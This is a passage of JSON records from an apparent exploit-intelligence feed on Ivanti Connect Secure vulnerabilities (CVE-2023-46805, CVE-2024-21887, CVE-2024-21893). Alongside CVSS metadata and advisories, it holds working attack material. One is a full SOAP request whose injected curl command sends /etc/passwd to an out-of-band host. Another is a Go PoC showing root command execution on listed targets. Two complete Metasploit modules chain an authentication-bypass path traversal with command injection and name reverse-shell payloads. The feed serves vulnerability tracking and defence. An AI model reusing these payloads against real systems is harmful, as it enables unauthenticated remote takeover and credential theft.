"description": "CVE-2024-21893 is server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA allows an attacker to access certain restricted resources without authentication.\n\nrun `python CVE-2024-21893.py -u target.com -a http://xxxxxxxxx.oastify.com`\n\n![image](https://github.com/h4x0r-dz/CVE-2024-21893.py/assets/26070859/bec33c87-a6c7-4db3-aedc-5749e994c917)\n\n![image](https://github.com/h4x0r-dz/CVE-2024-21893.py/assets/26070859/c38f93de-379b-4b76-8326-e66c019dfa2a)\n\n### RCE \n\n```\nPOST /dana-ws/saml20.ws HTTP/1.1\nHost: target.com\nAccept: */*\nContent-Type: text/xml\nContent-Length: 934\nConnection: close\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n\t<soap:Body>\n\t\t<ds:Signature\n\t\txmlns:ds=\"http://www.w3.org/2000/09/xmldsig#\">\n\t\t\t<ds:SignedInfo>\n\t\t\t\t<ds:CanonicalizationMethod Algorithm=\"http://www.w3.org/2001/10/xml-exc-c14n#\"/>\n\t\t\t\t<ds:SignatureMethod Algorithm=\"http://www.w3.org/2000/09/xmldsig#rsa-sha1\"/>\n\t\t\t</ds:SignedInfo>\n\t\t\t<ds:SignatureValue>qwerty</ds:SignatureValue>\n\t\t\t<ds:KeyInfo xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://www.w3.org/2000/09/xmldsig\" xmlns:ds=\"http://www.w3.org/2000/09/xmldsig#\">\n\t\t\t\t<ds:RetrievalMethod URI=\"http://127.0.0.1:8090/api/v1/license/keys-status/%3bcurl%20-X%20POST%20-d%20%40%2fetc%2fpasswd%20http%3a%2f%2f8oxxxxxxxxxxxxx.oastify.com%3b\"/>\n\t\t\t\t<ds:X509Data/>\n\t\t\t</ds:KeyInfo>\n\t\t\t<ds:Object></ds:Object>\n\t\t</ds:Signature>\n\t</soap:Body>\n</soap:Envelope>\n\n```\n\n![image](https://github.com/h4x0r-dz/CVE-2024-21893.py/assets/26070859/e7d7180a-b158-4437-9dd9-97d4c55539c9)\n\n\nReference : https://attackerkb.com/topics/FGlK1TVnB2/cve-2024-21893/rapid7-analysis \n",
"published": "2024-02-02T22:59:21",
"modified": "2024-02-12T01:28:50",
"cvss": {
"score": 6.4,
"vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"
},
"cvss2": {
"cvssV2": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
"accessVector": "NETWORK",
"accessComplexity": "LOW",
"authentication": "NONE",
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"availabilityImpact": "NONE",
"baseScore": 6.4
},
"severity": "MEDIUM",
"exploitabilityScore": 10.0,
"impactScore": 4.9,
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false
},
"cvss3": {
"source": "[email protected]",
"type": "Secondary",
"exploitabilityScore": 3.9,
"impactScore": 4.2,
"cvssV3": {
"version": "3.0",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"availabilityImpact": "NONE",
"baseScore": 8.2,
"baseSeverity": "HIGH"
}
},
"href": "https://github.com/h4x0r-dz/CVE-2024-21893.py",
"cvelist": [
"CVE-2024-21893"
],
"lastseen": "2024-02-12T15:13:47",
"ai_score": {
"value": 7.2,
"uncertanity": 2.4,
"vector": "NONE"
}
},
{
"id": "8859BDA5-3AF8-5282-B64F-94D52BB81510",
"type": "githubexploit",
"bulletinFamily": "exploit",
"title": "Exploit for Improper Authentication in Ivanti Connect Secure",
"description": "\n**Title: Proof of Concept for CVE-2023-46805 - For Educational Use Only**\n\n**License:** This work is placed under the [Creative Commons Attribution 4.0 International License (CC BY 4.0)](https://creativecommons.org/licenses/by/4.0/). You are free to share, copy, distribute, and transmit this work, to adapt it or use it for other purposes, provided the authorship is appropriately attributed.\n\n**Disclaimer:** This Proof of Concept (PoC) is provided for educational and cybersecurity research purposes only. Neither the author, the affiliated organization, nor any other party involved in the creation, production, or delivery of this content will be liable for any damages, including, but not limited to, direct, indirect, incidental, special, consequential, or punitive damages arising from the use or inability to use this content.\n\n**Educational Objective:** This PoC is intended to aid the cybersecurity community in understanding and mitigating the vulnerability identified as CVE-2023-46805. It should not be used in a production environment or for malicious activities.\n\n**Vulnerability Description:** Ivanti RCE\n\n**PoC Details:** \n\n```bash\nUsage of ./CVE-Ivanti:\n -cmd string\n The command to replace 'id' in the payload (default \"id\")\n -t int\n Number of concurrent threads (default 5)\n\n```\n\n```bash\ngo build\necho \"https://1.2.3.4\" | ./CVE-Ivanti\nhttps://1.2.3.4 {\"error\": \"uid=0(root) gid=0(root) groups=0(root)\\n\"}\n\ncat myscope.txt -t 5 | ./CVE-Ivanti\nhttps://ssl1.mysite.com:443 {\"error\": \"uid=0(root) gid=0(root) groups=0(root)\\n\"}\nhttps://ssl3.mysite.com:443 {\"error\": \"uid=0(root) gid=0(root) groups=0(root)\\n\"}\n\necho \"https://1.2.3.4\" | ./CVE-Ivanti -cmd 'ls /'\n```\n",
"published": "2024-01-25T14:53:16",
"modified": "2024-01-31T02:24:37",
"cvss": {
"score": 6.4,
"vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"
},
"cvss2": {
"cvssV2": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
"accessVector": "NETWORK",
"accessComplexity": "LOW",
"authentication": "NONE",
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"availabilityImpact": "NONE",
"baseScore": 6.4
},
"severity": "MEDIUM",
"exploitabilityScore": 10.0,
"impactScore": 4.9,
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false
},
"cvss3": {
"source": "[email protected]",
"type": "Secondary",
"exploitabilityScore": 3.9,
"impactScore": 4.2,
"cvssV3": {
"version": "3.0",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"availabilityImpact": "NONE",
"baseScore": 8.2,
"baseSeverity": "HIGH"
}
},
"href": "https://github.com/w2xim3/CVE-2023-46805",
"cvelist": [
"CVE-2023-46805"
],
"lastseen": "2024-02-12T15:14:56",
"ai_score": {
"value": 8.6,
"uncertanity": 0.1,
"vector": "NONE"
}
},
{
"id": "A559D688-3B3F-5C2E-8524-DE9364606561",
"type": "githubexploit",
"bulletinFamily": "exploit",
"title": "Exploit for Improper Authentication in Ivanti Connect Secure",
"description": "# \ud83d\udea8 CVE-2023-46805 Scanner Tool \ud83d\udee0\ufe0f\n\nA robust tool for detecting the CVE-2023-46805 vulnerability in Ivanti Pulse Connect Secure systems. This tool is inspired by the high-signal detection methods developed by AssetNote, focusing on authentication bypass vulnerabilities in these systems.\n\n## \ud83d\udcdd Description\n\nCVE-2023-46805 is a critical vulnerability that allows unauthorized bypass of authentication mechanisms in certain Ivanti Pulse Connect Secure versions. This tool aids in identifying affected systems, leveraging detection techniques based on AssetNote's research. \n\nFor more details on the methodology, see AssetNote's research: [High-Signal Detection and Exploitation of Ivanti\u2019s Pulse Connect Secure Auth Bypass](https://www.assetnote.io/resources/research/high-signal-detection-and-exploitation-of-ivantis-pulse-connect-secure-auth-bypass-rce)\n\n## \ud83d\ude80 Features\n\n- **Single URL Scan**: Focus on a single target for quick assessment.\n- **Bulk Scanning**: Analyze multiple URLs from a file for widespread assessment.\n- **Thread Control**: Customize concurrent scanning with adjustable thread options.\n- **Output Logging**: Save identified potentially vulnerable URLs to a file.\n\n## \ud83d\udcda How to Use\n\n1. Install dependencies: `pip install -r requirements.txt`\n2. Run the tool:\n - Single URL: `python scanner.py -u <URL>`\n - Bulk scan: `python scanner.py -f <file-path>`\n - With threads: `python scanner.py -f <file-path> -t <number-of-threads>`\n - Save output: `python scanner.py -f <file-path> -o <output-file-path>`\n\n\u26a0\ufe0f **Disclaimer**: This tool is provided for educational and ethical testing purposes only. The author is not responsible for any misuse or damage caused by this tool. Always obtain explicit permission before testing systems that you do not own or have explicit authorization to test.\n",
"published": "2024-01-19T02:23:13",
"modified": "2024-01-23T21:09:42",
"cvss": {
"score": 6.4,
"vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"
},
"cvss2": {
"cvssV2": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
"accessVector": "NETWORK",
"accessComplexity": "LOW",
"authentication": "NONE",
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"availabilityImpact": "NONE",
"baseScore": 6.4
},
"severity": "MEDIUM",
"exploitabilityScore": 10.0,
"impactScore": 4.9,
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false
},
"cvss3": {
"source": "[email protected]",
"type": "Secondary",
"exploitabilityScore": 3.9,
"impactScore": 4.2,
"cvssV3": {
"version": "3.0",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"availabilityImpact": "NONE",
"baseScore": 8.2,
"baseSeverity": "HIGH"
}
},
"href": "https://github.com/Chocapikk/CVE-2023-46805",
"cvelist": [
"CVE-2023-46805"
],
"lastseen": "2024-02-12T15:17:24",
"ai_score": {
"value": 7.5,
"uncertanity": 3.0,
"vector": "NONE"
}
},
{
"id": "B529BDE5-C872-5C41-81E2-63068A3535D0",
"type": "githubexploit",
"bulletinFamily": "exploit",
"title": "Exploit for Command Injection in Ivanti Connect Secure",
"description": "# \ud83d\udea8 CVE-2024-21887 Exploit Tool \ud83d\udee0\ufe0f\n\nA robust tool for detecting and exploiting the CVE-2024-21887 vulnerability in Ivanti Connect and Policy Secure systems.\n\n## \ud83d\udcdd Description\n\nCVE-2024-21887 is a critical command injection vulnerability, allowing authenticated admins to execute arbitrary commands. This tool aids in identifying and interacting with affected systems.\n\n## \ud83d\ude80 Features\n\n- **Single URL Scan**: Pinpoint focus on a single target.\n- **Bulk Scanning**: Analyze multiple URLs from a file.\n- **Thread Control**: Customize concurrent scanning with thread options.\n- **Output Logging**: Save identified vulnerable URLs to a file.\n\n## \ud83d\udcda How to Use\n\n1. Install dependencies: `pip install -r requirements.txt`\n2. Run the tool:\n - Single URL: `python exploit.py -u <URL>`\n - Bulk scan: `python exploit.py -f <file-path>`\n - With threads: `python exploit.py -f <file-path> -t <number-of-threads>`\n - Save output: `python exploit.py -f <file-path> -o <output-file-path>`\n\n\u26a0\ufe0f **Disclaimer**: This tool is provided for educational and ethical testing purposes only. I am not responsible for any misuse or damage caused by this tool. Always obtain explicit permission before testing systems that you do not own or have explicit authorization to test.\n",
"published": "2024-01-16T20:59:38",
"modified": "2024-02-12T12:56:01",
"cvss": {
"score": 5.8,
"vector": "AV:N/AC:L/Au:M/C:P/I:P/A:P"
},
"cvss2": {
"cvssV2": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P",
"accessVector": "NETWORK",
"accessComplexity": "LOW",
"authentication": "MULTIPLE",
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8
},
"severity": "MEDIUM",
"exploitabilityScore": 6.4,
"impactScore": 6.4,
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false
},
"cvss3": {
"source": "[email protected]",
"type": "Secondary",
"exploitabilityScore": 2.3,
"impactScore": 6.0,
"cvssV3": {
"version": "3.0",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "HIGH",
"userInteraction": "NONE",
"scope": "CHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL"
}
},
"href": "https://github.com/Chocapikk/CVE-2024-21887",
"cvelist": [
"CVE-2024-21887"
],
"lastseen": "2024-02-12T15:16:47",
"ai_score": {
"value": 8.2,
"uncertanity": 1.7,
"vector": "NONE"
}
},
{
"id": "MSF:EXPLOIT-LINUX-HTTP-IVANTI_CONNECT_SECURE_RCE_CVE_2023_46805-",
"type": "metasploit",
"bulletinFamily": "exploit",
"title": "Ivanti Connect Secure Unauthenticated Remote Code Execution",
"description": "This module chains an authentication bypass vulnerability (CVE-2023-46805) and a command injection vulnerability (CVE-2024-21887) to exploit vulnerable instances of either Ivanti Connect Secure or Ivanti Policy Secure, to achieve unauthenticated remote code execution. All currently supported versions 9.x and 22.x prior to the vendor mitigation are vulnerable. It is unknown if unsupported versions 8.x and below are also vulnerable.\n",
"published": "2024-01-16T14:32:48",
"modified": "2024-01-18T15:35:43",
"cvss": {
"score": 6.4,
"vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"
},
"cvss2": {
"cvssV2": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
"accessVector": "NETWORK",
"accessComplexity": "LOW",
"authentication": "NONE",
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"availabilityImpact": "NONE",
"baseScore": 6.4
},
"severity": "MEDIUM",
"exploitabilityScore": 10.0,
"impactScore": 4.9,
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false
},
"cvss3": {
"source": "[email protected]",
"type": "Secondary",
"exploitabilityScore": 2.3,
"impactScore": 6.0,
"cvssV3": {
"version": "3.0",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "HIGH",
"userInteraction": "NONE",
"scope": "CHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL"
}
},
"href": "https://www.rapid7.com/db/modules/exploit/linux/http/ivanti_connect_secure_rce_cve_2023_46805/",
"cvelist": [
"CVE-2023-46805",
"CVE-2024-21887"
],
"lastseen": "2024-02-12T13:24:08",
"sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2023_46805.rb",
"sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Ivanti Connect Secure Unauthenticated Remote Code Execution',\n 'Description' => %q{\n This module chains an authentication bypass vulnerability (CVE-2023-46805) and a command injection\n vulnerability (CVE-2024-21887) to exploit vulnerable instances of either Ivanti Connect Secure or Ivanti\n Policy Secure, to achieve unauthenticated remote code execution. All currently supported versions 9.x and\n 22.x prior to the vendor mitigation are vulnerable. It is unknown if unsupported versions 8.x and below are\n also vulnerable.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'sfewer-r7', # MSF Exploit & Rapid7 Analysis\n ],\n 'References' => [\n ['CVE', '2023-46805'], # The auth bypass vulnerability.\n ['CVE', '2024-21887'], # The command injection vulnerability.\n ['URL', 'https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis'],\n ['URL', 'https://labs.watchtowr.com/welcome-to-2024-the-sslvpn-chaos-continues-ivanti-cve-2023-46805-cve-2024-21887/']\n ],\n 'DisclosureDate' => '2024-01-10',\n 'Platform' => %w[linux unix],\n 'Arch' => [ARCH_CMD],\n 'Privileged' => true, # Code execution as root.\n 'Targets' => [\n [\n # Tested against Ivanti Connect Secure version 22.3R1 (build 1647) with the following payloads:\n # cmd/linux/http/x64/meterpreter/reverse_tcp\n # cmd/linux/http/x64/shell/reverse_tcp\n # cmd/linux/http/x86/shell/reverse_tcp\n 'Linux Command',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_CMD]\n },\n ],\n [\n # Tested against Ivanti Connect Secure version 22.3R1 (build 1647) with the following payloads:\n # cmd/unix/python/meterpreter/reverse_tcp\n # cmd/unix/reverse_bash\n # cmd/unix/reverse_python\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => [ARCH_CMD]\n },\n ]\n ],\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true,\n 'FETCH_WRITABLE_DIR' => '/tmp'\n },\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS]\n }\n )\n )\n end\n\n def check\n # We leverage the auth bypass to request the authenticated endpoint /api/v1/system/system-information and retrieve\n # the target system version information. If this requests succeeds, the target is vulnerable.\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => '/api/v1/totp/user-backup-code/../../system/system-information'\n )\n\n return CheckCode::Unknown('Connection failed') unless res\n\n # If the vendor mitigation has been applied, the request will return 403 Forbidden.\n return CheckCode::Safe if res.code != 200\n\n # By here we know the target is vulnerable, we can pull out the exact version information from the expected JSON\n # response, this is only for display purposes, we don't need to test the version information.\n\n json_data = res.get_json_document\n\n name = json_data.dig('software-inventory', 'software', 'name')\n\n version = json_data.dig('software-inventory', 'software', 'version')\n\n build = json_data.dig('software-inventory', 'software', 'build')\n\n # Return CheckCode::Unknown if we got a JSON response but it didn't contain the expected keys, or if\n # get_json_document could not parse the JSON (and will return an empty Hash).\n return CheckCode::Unknown('No version information in response') if name.nil? || version.nil? || build.nil?\n\n Exploit::CheckCode::Vulnerable(\"#{name} #{version} (#{build})\")\n end\n\n def exploit\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => '/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection',\n 'ctype' => 'application/json',\n 'data' => {\n 'type' => \";#{payload.encoded} #\",\n 'txtGCPProject' => Rex::Text.rand_text_alpha(8),\n 'txtGCPSecret' => Rex::Text.rand_text_alpha(8),\n 'txtGCPPath' => Rex::Text.rand_text_alpha(8),\n 'txtGCPBucket' => Rex::Text.rand_text_alpha(8)\n }.to_json\n )\n end\nend\n",
"ai_score": {
"value": 8.8,
"uncertanity": 2.2,
"vector": "NONE"
}
},
{
"id": "PACKETSTORM:176668",
"type": "packetstorm",
"bulletinFamily": "exploit",
"title": "Ivanti Connect Secure Unauthenticated Remote Code Execution",
"description": "",
"published": "2024-01-22T00:00:00",
"modified": "2024-01-22T00:00:00",
"cvss": {
"score": 6.4,
"vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"
},
"cvss2": {
"cvssV2": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
"accessVector": "NETWORK",
"accessComplexity": "LOW",
"authentication": "NONE",
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"availabilityImpact": "NONE",
"baseScore": 6.4
},
"severity": "MEDIUM",
"exploitabilityScore": 10.0,
"impactScore": 4.9,
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false
},
"cvss3": {
"source": "[email protected]",
"type": "Secondary",
"exploitabilityScore": 2.3,
"impactScore": 6.0,
"cvssV3": {
"version": "3.0",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "HIGH",
"userInteraction": "NONE",
"scope": "CHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL"
}
},
"href": "https://packetstormsecurity.com/files/176668/Ivanti-Connect-Secure-Unauthenticated-Remote-Code-Execution.html",
"cvelist": [
"CVE-2023-46805",
"CVE-2024-21887"
],
"lastseen": "2024-01-22T16:02:50",
"sourceHref": "https://packetstormsecurity.com/files/download/176668/ivanti_connect_secure_rce_cve_2023_46805.rb.txt",
"sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \nprepend Msf::Exploit::Remote::AutoCheck \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Ivanti Connect Secure Unauthenticated Remote Code Execution', \n'Description' => %q{ \nThis module chains an authentication bypass vulnerability (CVE-2023-46805) and a command injection \nvulnerability (CVE-2024-21887) to exploit vulnerable instances of either Ivanti Connect Secure or Ivanti \nPolicy Secure, to achieve unauthenticated remote code execution. All currently supported versions 9.x and \n22.x prior to the vendor mitigation are vulnerable. It is unknown if unsupported versions 8.x and below are \nalso vulnerable. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'sfewer-r7', # MSF Exploit & Rapid7 Analysis \n], \n'References' => [ \n['CVE', '2023-46805'], # The auth bypass vulnerability. \n['CVE', '2024-21887'], # The command injection vulnerability. \n['URL', 'https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis'], \n['URL', 'https://labs.watchtowr.com/welcome-to-2024-the-sslvpn-chaos-continues-ivanti-cve-2023-46805-cve-2024-21887/'] \n], \n'DisclosureDate' => '2024-01-10', \n'Platform' => %w[linux unix], \n'Arch' => [ARCH_CMD], \n'Privileged' => true, # Code execution as root. \n'Targets' => [ \n[ \n# Tested against Ivanti Connect Secure version 22.3R1 (build 1647) with the following payloads: \n# cmd/linux/http/x64/meterpreter/reverse_tcp \n# cmd/linux/http/x64/shell/reverse_tcp \n# cmd/linux/http/x86/shell/reverse_tcp \n'Linux Command', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_CMD] \n}, \n], \n[ \n# Tested against Ivanti Connect Secure version 22.3R1 (build 1647) with the following payloads: \n# cmd/unix/python/meterpreter/reverse_tcp \n# cmd/unix/reverse_bash \n# cmd/unix/reverse_python \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => [ARCH_CMD] \n}, \n] \n], \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true, \n'FETCH_WRITABLE_DIR' => '/tmp' \n}, \n'DefaultTarget' => 0, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS] \n} \n) \n) \nend \n \ndef check \n# We leverage the auth bypass to request the authenticated endpoint /api/v1/system/system-information and retrieve \n# the target system version information. If this requests succeeds, the target is vulnerable. \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => '/api/v1/totp/user-backup-code/../../system/system-information' \n) \n \nreturn CheckCode::Unknown('Connection failed') unless res \n \n# If the vendor mitigation has been applied, the request will return 403 Forbidden. \nreturn CheckCode::Safe if res.code != 200 \n \n# By here we know the target is vulnerable, we can pull out the exact version information from the expected JSON \n# response, this is only for display purposes, we don't need to test the version information. \n \njson_data = res.get_json_document \n \nname = json_data.dig('software-inventory', 'software', 'name') \n \nversion = json_data.dig('software-inventory', 'software', 'version') \n \nbuild = json_data.dig('software-inventory', 'software', 'build') \n \n# Return CheckCode::Unknown if we got a JSON response but it didn't contain the expected keys, or if \n# get_json_document could not parse the JSON (and will return an empty Hash). \nreturn CheckCode::Unknown('No version information in response') if name.nil? || version.nil? || build.nil? \n \nExploit::CheckCode::Vulnerable(\"#{name} #{version} (#{build})\") \nend \n \ndef exploit \nsend_request_cgi( \n'method' => 'POST', \n'uri' => '/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection', \n'ctype' => 'application/json', \n'data' => { \n'type' => \";#{payload.encoded} #\", \n'txtGCPProject' => Rex::Text.rand_text_alpha(8), \n'txtGCPSecret' => Rex::Text.rand_text_alpha(8), \n'txtGCPPath' => Rex::Text.rand_text_alpha(8), \n'txtGCPBucket' => Rex::Text.rand_text_alpha(8) \n}.to_json \n) \nend \nend \n`\n",
"ai_score": {
"value": 7.4,
"uncertanity": 1.9,
"vector": "NONE"
}
},
{
"id": "SAINT:023354DDA8BBB4879D8A5440380C03C9",
"type": "saint",
"bulletinFamily": "exploit",
"title": "Ivanti Connect Secure Server-Side Request Forgery",
"description": "Added: 02/05/2024 \n\n\n### Background\n\n[Ivanti Connect Secure](<https://www.ivanti.com/products/connect-secure-vpn>) is a web-based remote access VPN. \n\n### Problem\n\nA server-side request forgery vulnerability in the SAML component allows attackers to access restricted resources without authentication. This can lead to remote command execution when chained with other vulnerabilities. \n\n### Resolution\n\nApply the appropriate patch referenced in the [Ivanti Security Advisory](<https://forums.ivanti.com/s/article/CVE-2024-21888-Privilege-Escalation-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure>). \n\n### References\n\n<https://forums.ivanti.com/s/article/CVE-2024-21888-Privilege-Escalation-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure> \n\n\n### Platforms\n\nLinux \n \n\n",
"published": "2024-02-05T00:00:00",
"modified": "2024-02-05T00:00:00",
"cvss": {
"score": 6.5,
"vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"
},
"cvss2": {
"cvssV2": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"accessVector": "NETWORK",
"accessComplexity": "LOW",
"authentication": "SINGLE",
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5
},
"severity": "MEDIUM",
"exploitabilityScore": 8.0,
"impactScore": 6.4,
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false
},
"cvss3": {
"source": "[email protected]",
"type": "Secondary",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"cvssV3": {
"version": "3.0",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "LOW",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH"
}
},
"href": "https://download.saintcorporation.com/cgi-bin/exploit_info/ivanti_connect_secure_ssrf",
"cvelist": [
"CVE-2024-21888"
],
"lastseen": "2024-02-12T13:22:09",
"ai_score": {
"value": 7.6,
"uncertanity": 2.5,
"vector": "NONE"
}
},
{
"id": "SAINT:60BDA75642503EC398357486212FA6C7",
"type": "saint",
"bulletinFamily": "exploit",
"title": "Invanti Connect Secure and Policy Secure authentication bypass and command injection",
"description": "Added: 01/18/2024 \n\n\n### Background\n\n[Ivanti Connect Secure](<https://www.ivanti.com/products/connect-secure-vpn>) is a web-based remote access VPN. \n\n### Problem\n\nAn authentication bypass vulnerability and a command injection vulnerability when exploited together could allow a remote unauthenticated attacker to execute arbitrary commands. \n\n### Resolution\n\nApply the appropriate patch for your Ivanti product when available, or import the `mitigation.release.20240107.1.xml` file as a workaround. See the [Invanti knowledgebase article](<https://forums.ivanti.com/s/article/KB-CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways>) for more information. \n\n### References\n\n<https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways> \n \n\n",
"published": "2024-01-18T00:00:00",
"modified": "2024-01-18T00:00:00",
"cvss": {
"score": 6.4,
"vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"
},
"cvss2": {
"cvssV2": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
"accessVector": "NETWORK",
"accessComplexity": "LOW",
"authentication": "NONE",
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"availabilityImpact": "NONE",
"baseScore": 6.4
},
"severity": "MEDIUM",
"exploitabilityScore": 10.0,
"impactScore": 4.9,
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false
},
"cvss3": {
"source": "[email protected]",
"type": "Secondary",
"exploitabilityScore": 2.3,
"impactScore": 6.0,
"cvssV3": {
"version": "3.0",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "HIGH",
"userInteraction": "NONE",
"scope": "CHANGED",
